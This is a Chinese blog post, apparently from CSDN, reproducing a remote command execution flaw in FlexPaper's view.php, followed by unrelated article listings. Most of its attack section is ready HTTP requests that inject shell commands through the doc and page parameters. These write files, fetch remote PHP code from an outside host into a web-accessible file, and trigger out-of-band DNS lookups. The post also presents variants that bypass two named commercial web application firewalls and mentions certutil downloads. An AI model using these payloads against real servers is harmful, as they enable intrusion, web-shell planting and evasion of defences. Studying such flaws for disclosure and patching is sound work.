flexpaper 远程命令执行

于 2024-05-01 14:00:00 发布
阅读量788 收藏 9
点赞数 21
文章标签: android python 算法 django pygame virtualenv 数据结构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A345545108/article/details/138198869
版权

flexpaper 远程命令执行

这个是有POC的,先简单复现一下

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.docx"+%26+echo+shell+>+shel233l.txt+%23&page=exp&format=swf&callback=callback&isSplit=true HTTP/1.1
Host: 192.168.50.22
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
HTTP/1.1 200 OK
Date: Sat, 20 Apr 2024 05:06:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=ac0c7cfca1fd60eca686482c25af2a61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Accept-Ranges: bytes
Connection: close
Content-Type: application/x-shockwave-flash

简单分析

重要的函数就是trans_pdf2png , trans_pdftk ,也就是tool_transform.php 里面的几个函数,可以看到他从view.php中获取的数据直接传到这几个函数里去了,这几个函数在tool_transform.php

 把几个传入的参数拼接了,直接exec运行

也就是直接使用管道符隔开就能运行别的

修复?

看下官方是怎么修复的,直接把view.php删掉了

 

但是tool_transform.php没删

增加难度

分别加上了xx服的af和ct的雷池试下,绕过这两个设备得到了两个可行的poc(已提交给了他们的PM)

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.pdf&format=swf&isSplit=true&page=||%22C%3A%5CProgram+Files+%28x86%29%5CTEC%5CWebServer%5Cphp%5Cphp.exe%22+-r+%22echo+file_get_contents%28%27http%3A%2F%2F192.168.10.248%2Fserver%2Fs.php%27%29%3B%22%20>>ttttt.php HTTP/1.1
Host: 192.168.10.197:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=a7a6c12f890da30b8908adbbcd6b1e41; ipg_session=d2dbf9993acef536d63350f7ceb06e4ccbf2f550
Connection: close

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.pdf&format=swf&isSplit=true&page=||nslookup%20yafjjulyfe.dgrh3.cn  HTTP/1.1
Host: 192.168.10.197:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=a7a6c12f890da30b8908adbbcd6b1e41; ipg_session=d2dbf9993acef536d63350f7ceb06e4ccbf2f550
Connection: close

雷池还可以用certutil -urlcache -f直接下文件,如果两个套娃套起来,一时没想到该怎么弄,后面某服af升级之后直接正则了这个url,那也确实没有什么好的办法了

海安P海云
关注
ASP.Net使用Flexpaper实现word、ppt、excel、pdf、图片在线预览
12-25
ASP.Net使用Flexpaper实现word、ppt、excel、pdf、图片在线预览
java实现附件预览(openoffice+swftools+flexpaper
热门推荐
z69183787的专栏
12-21 7万+
先附上本人参考的文章,基于的 flexpaper版本 为 1.5,本人由于使用的是 2.1.9 ,故之后说明: 1.概述 主要原理 1.通过第三方工具openoffice,将word、excel、ppt、txt等文件转换为pdf文件 2.通过swfTools将pdf文件转换成swf格式的文件 3.通过FlexPaper文档组件在页面上进行展示 2.安装包下载
flexpaper各项参数详解及使用
aijieli0531的博客
04-18 360
1.下载安装包 (1)安装openoffice:使用时需要开启服务(命令开启: cd C:\Program Files (x86)\OpenOffice 4\program soffice -headless -accept="socket,host=127.0.0.1,port=8100;urp;" -nofirststartwizard ) (2)安装安装...
FlexPaper的深入了解和应用
Eric的专栏
11-13 9262
FlexPaper是一个开源轻量级的在浏览器上显示各种文档的组件,被设计用来与PDF2SWF一起使用, 使在Flex中显示PDF成为可能,而这个过程并无需PDF软件环境的支持。
FlexPaper:使用flash在线展示pdf
weixin_34125592的博客
05-11 261
WFTools工具包中的PDF2SWF工具可用来将PDF格式文件转换成SWF格式。使用下面的命令可以将pdf文件转换为单页swf文件。   pdf2swf  pdfPath  –o swfPath  –T 9  –f。   pdf2swf为pdf2swf二进制命令的绝对路径;pdfpath为要进行转换的PDF文件的绝对路径;swfPath为转换后swf文件的路径;-T 9 用来设定转换的swf版本...
FlexPaper插件
09-13
FlexPaper是一款强大的在线文档预览解决方案,主要用于展示SWF文件,提供了一种高效且用户友好的方式来查看PDF、DJVU和其他文档格式。这款插件由Zoho开发,广泛应用于网页和应用程序中,为用户提供无缝的阅读体验。...
flexpaper2.2.7去水印版
07-26
FlexPaper 是一款强大的在线文档查看和转换工具,尤其适合用于展示PDF、图像和SWF文件。在本压缩包中提供的“flexpaper2.2.7去水印版”是经过个人开发者修改后的版本,主要特点是移除了默认的水印,提高了页面加载...
flexpaper工具集
10-27
这个工具集包含了Flexpaper运行所需的关键组件,让我们逐一解析其中的文件及其作用。 1. **swftools-2013-04-09-1007.exe**:这是SWFTools的安装程序,一个开源的命令行工具集合,主要用于处理Adobe Flash(SWF)...
FlexPaper_1.5.1_flash
11-27
FlexPaper是一款强大的在线文档查看和转换工具,专为在Web上提供流畅的PDF和文档浏览体验而设计。这个“FlexPaper_1.5.1_flash”版本是该软件的一个特定迭代,它主要依赖Adobe Flash技术来实现其功能。在本文中,...
flexPaper 1.45
10-14
FlexPaper 是一款强大的在线文档查看和转换工具,主要用于在网页上展示PDF、DJVU、图像和其他格式的文档。版本1.45是该软件的一个更新版本,它提供了对插件的支持,使得用户可以在浏览器中无缝地查看和交互文档。在...
Flex在线预览文档组件FlexPaper_swc
09-18
Flex用于在线文档pdf、word的预览组件FlexPaper_swc,含sdk3.5和sdk4.0两个版本。
FlexPaper_2.2.4php在线浏览WORD文档
04-05
FlexPaper_2.2.4php在线浏览WORD文档
.net+swftools+flexpaper pdf转swf实现在线预览 在线文库效果 可运行
09-21
解压可以直接运行,包含完整的 swftools 和 flexpaper_flash 中的js及swf。 在线文库效果 ………………
flexPaper的展示页面
04-25
<head> <title>FlexPaper</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css" media="screen"> html, body { height:100%; } body { margin:0; padding:0; overflow:auto; } #flashContent { display:none; } </style> [removed][removed] </head>
flexpaper仿百度文库
10-23
FlexPaper+SWFTools 实现仿百度文库网上已有很多FlexPaper仿百度文库的一些文章,园子里也有很多大牛的详细教程
flex--flexpaper(百度文档显示技术研究)
rubychen410的专栏
07-20 2323
看了一下百度文档分享平台的页面,对其中的技术实现,做了一些研究,还好有些成果,就拿来与大家分享一下。FlexPaper是一个开源的轻量级文档显示组件,被设计用来与PDF2SWF一起使用,使在Flex中显示PDF成为可能。它可以被当做Flex的library来使用。一. 使用PDF
关于跨域策略文件crossdomain.xml文件
weixin_30537451的博客
07-06 444
下载flexpaper源码修改后做成swf阅读器,要加入待阅读的swf文件,可以在flex里调用js的方法来获取swf文件的路径的方法,在js只专注获取路径就行,等着flex来调用:但这里会遇到一个问题那就是出现安全问题,如下的提示: Error #2044: 未处理的 onDocumentLoadedError:。 text=Error #2048: 安全沙箱冲突:http://loca...
java flexpaper 使用_flexpaper使用介绍
weixin_33037313的博客
02-13 441
工作中需要用到在线pdf阅读器,所以百度了下,找到了flexpaper这个工具。2.还需要一个工具SWFTool,这是一个将pdf转换成swf的工具 下载地址,下载以后安装。解压1中的压缩包,运行index.html.如果发现flash右上角的圆圈一直在转。如下图所示:然后在运行,你会发现成功了。这个例子运行都是很简单的,现在来说说怎么结合php使用。SWFTool,也就是2步装的软件这时候就需要...
关于FlexPaper的使用
u010000750的专栏
10-25 1063
首先,下载flexpaper,点击下载flexpaper
FlexPaper在线文档浏览器开发教程
swc版本为组件包,需要导入到工程中再调用,而flash版本可以单独执行,里面有例子、JS文件、SWF文件。我们通常采用flash版本来使用Flexpaper显示在线文档。 四、SWFTools的介绍 SWFTools是一个SWF处理、转换的开源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值